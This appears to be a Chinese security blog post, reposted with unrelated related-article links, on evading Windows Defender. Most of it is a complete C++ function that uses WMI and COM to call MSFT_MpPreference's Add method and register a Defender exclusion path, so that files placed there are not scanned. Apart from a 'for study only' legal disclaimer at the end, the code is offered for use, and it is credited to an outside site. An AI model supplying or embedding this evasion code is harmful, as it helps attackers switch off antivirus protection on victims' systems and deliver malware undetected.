利用 WMI and COM 绕过windows defender
2023-03-14 22:33:56 时间
先知上曾经有人发过一篇利用windows defender排除项来免杀的文章,文章地址:
https://xz.aliyun.com/t/10317
而这个过程我们也可以使用代码来进行实现
INT AddDefenderExclussion(WCHAR* exclpath)
{
/*
WCHAR path[] = L"C:\Temp";
INT res = AddDefenderExclussion(path);
if (!res)
{
::wprintf(L"[-] AddDefenderExclussion has failed
");
}
*/
HRESULT hr;
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeEx has failed
");
return 0;
}
hr = CoInitializeSecurity(
NULL,
-1,
NULL,
NULL,
RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE,
NULL
);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeSecurity has failed
");
CoUninitialize();
return 0;
}
IWbemLocator* pLoc = 0;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
if (FAILED(hr))
{
::wprintf(L"[-] CoCreateInstance has failed
");
CoUninitialize();
return 0;
}
IWbemServices* pSvc = 0;
hr = pLoc->ConnectServer(BSTR(L"ROOT\Microsoft\Windows\Defender"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr))
{
::wprintf(L"[-] ConnectServer has failed
");
pLoc->Release();
CoUninitialize();
return 0;
}
hr = CoSetProxyBlanket(
pSvc,
RPC_C_AUTHN_WINNT,
RPC_C_AUTHZ_NONE,
NULL,
RPC_C_AUTHN_LEVEL_CALL,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE
);
if (FAILED(hr))
{
::wprintf(L"[-] CoSetProxyBlanket has failed
");
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClass = 0;
BSTR Clname = BSTR(L"MSFT_MpPreference");
hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL);
BSTR MethodName = BSTR(L"Add");
IWbemClassObject* pInSignature = 0;
hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] GetMethod has failed
");
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClassInstance = NULL;
hr = pInSignature->SpawnInstance(0, &pClassInstance);
if (FAILED(hr))
{
::wprintf(L"[-] SpawnInstance has failed
");
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
// Create an array
SAFEARRAYBOUND rgsaBounds[1];
rgsaBounds[0].cElements = 1;
rgsaBounds[0].lLbound = 0;
SAFEARRAY* psaStrings;
psaStrings = SafeArrayCreate(VT_BSTR, 1, rgsaBounds);
// Add a string to the array
VARIANT vString;
VariantInit(&vString);
V_VT(&vString) = VT_BSTR;
V_BSTR(&vString) = _bstr_t(exclpath);
LONG lArrayIndex = 0;
SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));
VariantClear(&vString);
// variant array
VARIANT vStringList;
VariantInit(&vStringList);
V_VT(&vStringList) = VT_ARRAY | VT_BSTR;
V_ARRAY(&vStringList) = psaStrings;
// Store the value for the in parameters
hr = pClassInstance->Put(L"ExclusionPath", 0, &vStringList, CIM_STRING|CIM_FLAG_ARRAY);
if (FAILED(hr))
{
::wprintf(L"[-] Put has failed %x
", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] ExecMethod has failed %x
", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pLoc->Release();
pSvc->Release();
CoUninitialize();
return 1;
}
代码来自:https://stmxcsr.com/micro/
除此之外,网站还有很多其他的功能实现,推荐阅读使用。
请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!
相关文章
- 史上最强算法论战:请不要嘻哈,这是哈希
- 史上最强算法论战:请不要嘻哈,这是哈希
- 《史上最强算法论战》是怎样炼成的?
- TED | 算法:赋予无人机生命!
- 【干货】推荐系统原理介绍
- 2015中国SaaS生态“元素周期表”
- 用R语言进行数据可视化的综合指南(一)
- 【干货】机器学习常见算法分类汇总
- 图解 | 从武侠角度探究STL排序算法的奥秘
- 用R语言进行数据可视化的综合指南(二)
- 有了这个开源项目,小白也能搭建电商系统
- 设计模式系列之观察者模式
- 2015上半年度金融行业互联网安全报告
- YouTube 推荐算法被曝倾向于潜在有害视频
- 干了这么些年程序员,这7种软件架构模式必须得掌握了
- 当Vue2遇到Composition API,它们之前到底能擦出怎样的火花?
- 百年献礼开发一款党史学习服务卡片
- 如何选择满足需求的SQL on Hadoop/Spark系统
- 聊聊Swift 中 key paths 的能力
- 这个文件下载问题难住了我至少三位同事